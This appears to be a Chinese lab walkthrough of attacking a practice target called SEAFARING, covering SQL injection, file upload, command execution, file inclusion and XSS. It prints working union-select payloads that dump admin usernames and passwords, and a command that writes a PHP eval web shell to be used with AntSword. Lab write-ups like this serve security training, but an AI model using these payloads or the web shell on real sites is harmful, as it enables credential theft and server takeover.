SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

3.三处都是回显点

4.联合查询爆出库名

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

2.上传一句话木马进去

3.将文件地址拼接到网址后进行访问

4.使用蚁剑连接

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

2.尝试输入ls有效

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php

4.复制地址用蚁剑连接

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

2.访问php文件复制地址蚁剑连连接即可

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

相关推荐
flypwn19 小时前
TFCCTF 2025 WebLess题解
服务器·前端·数据库
n***i9519 小时前
云原生数据库使用体验,与传统数据库差异
数据库·云原生
理想三旬1 天前
关系数据库
数据库
无心水1 天前
【分布式利器:RocketMQ】2、RocketMQ消息重复?3种幂等方案,彻底解决重复消费(附代码实操)
网络·数据库·rocketmq·java面试·消息幂等·重复消费·分布式利器
q***98521 天前
基于人脸识别和 MySQL 的考勤管理系统实现
数据库·mysql
l1t1 天前
用SQL求解advent of code 2024年23题
数据库·sql·算法
办公解码器1 天前
Excel工作表打开一次后自动销毁文件,回收站中都找不到
数据库·excel
Andya_net1 天前
网络安全 | 深入了解OAuth 2.0原理
安全·web安全·github
半个西瓜.1 天前
车联网安全:调试接口安全测试.
网络·安全·web安全·网络安全·车载系统
爬山算法1 天前
Redis(127)Redis的内部数据结构是什么?
数据结构·数据库·redis